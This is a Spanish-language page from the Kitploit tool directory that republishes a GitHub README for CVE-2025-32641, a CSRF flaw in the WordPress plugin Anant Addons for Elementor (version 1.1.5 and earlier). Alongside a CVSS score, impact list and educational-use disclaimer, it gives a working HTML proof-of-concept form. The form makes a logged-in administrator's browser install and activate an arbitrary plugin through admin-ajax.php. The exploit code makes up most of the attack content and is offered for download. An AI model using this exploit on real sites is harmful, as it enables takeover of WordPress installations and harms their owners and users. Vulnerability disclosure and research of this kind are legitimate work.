Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-32641 — Vulnerabilidad de CSRF a instalación arbitraria de plugins en Anant Addons for Elementor <= 1.1.5 | Kitploit
Herramientas/GitHubGitHub/nxploited/cve-2025-32641
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebSeguridad WebPapers e InvestigaciónAprendizaje y Educación
GitHubnxploited/cve-2025-32641

CVE-2025-32641

Vulnerabilidad de CSRF a instalación arbitraria de plugins en Anant Addons for Elementor <= 1.1.5

Ver Repositorio
hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

🛡️ Anant Addons for Elementor <= 1.1.5 - CSRF para instalación arbitraria de plugins

🧨 CVE-2025-32641

Vulnerabilidad de falsificación de solicitudes entre sitios (CSRF) en anantaddons' Anant Addons for Elementor
Este problema afecta a las versiones: desde una versión desconocida hasta la 1.1.5

  • Puntuación base: 9.6 (CRÍTICA)
  • Vector CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

🔍 Descripción

Esta vulnerabilidad permite a atacantes no autenticados realizar una instalación arbitraria de plugins en nombre de un administrador con sesión iniciada sin que este lo sepa.
Al crear una página o formulario malicioso, el atacante puede forzar silenciosamente al administrador a instalar y activar cualquier plugin del repositorio de WordPress.


💥 Impacto

  • ✅ Instalación arbitraria de plugins
  • ✅ Activación de plugins
  • ❌ Sin protección nonce ni CSRF
  • ✅ Explotable mediante una simple página HTML
  • ⚠️ Requiere que el administrador tenga la sesión iniciada y abra la página maliciosa

🧪 Prueba de concepto en HTML

root@kitploit:~
<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <title>Anant Addons for Elementor <= 1.1.5 CSRF Exploit</title>
  <style>
    body {
      background-color: #111;
      color: #0f0;
      font-family: monospace;
      padding: 40px;
    }
    h1 {
      color: #ff0055;
      font-size: 24px;
      border-bottom: 1px solid #555;
      padding-bottom: 10px;
    }
    .box {
      background-color: #222;
      border: 1px solid #444;
      padding: 20px;
      margin-top: 20px;
    }
    input[type="submit"] {
      background-color: #ff0055;
      color: #fff;
      border: none;
      padding: 10px 20px;
      font-weight: bold;
      cursor: pointer;
    }
    input[type="submit"]:hover {
      background-color: #cc0044;
    }
  </style>
</head>
<body>

  <h1>
    Anant Addons for Elementor <= 1.1.5<br>
    CSRF to Arbitrary Plugin Installation Vulnerability
  </h1>

  <div class="box">
    <p># By: <strong>Nxploited | Khaled Alenazi</strong></p>
    <p># Type: <strong>CSRF (No Nonce Validation)</strong></p>
    <p># Impact: <strong>Unauthenticated attacker can force admin to install and activate arbitrary WordPress plugins</strong></p>
  </div>

  <form action="http://192.168.100.74:888/wordpress/wp-admin/admin-ajax.php?action=install_act_plugin" method="POST" class="box">
    <input type="hidden" name="plugs" value="hello-dolly">
    <p>🎯 Click the button below to trigger plugin installation (admin session must be active):</p>
    <input type="submit" value="Exploit Now">
  </form>

</body>
</html>


🎯 Cuando un administrador con sesión iniciada hace clic en este formulario (o se envía automáticamente en una página maliciosa), el plugin se instalará y activará silenciosamente.


⚠️ Descargo de responsabilidad

Este repositorio y su contenido son únicamente para fines educativos y de investigación en seguridad.
El autor no es responsable de ningún uso indebido o daño causado por el uso inapropiado de esta información.
Realiza siempre las pruebas en sistemas que poseas o tengas permiso explícito para probar.


por: Nxploited | Khaled ALenazi

Descargar herramienta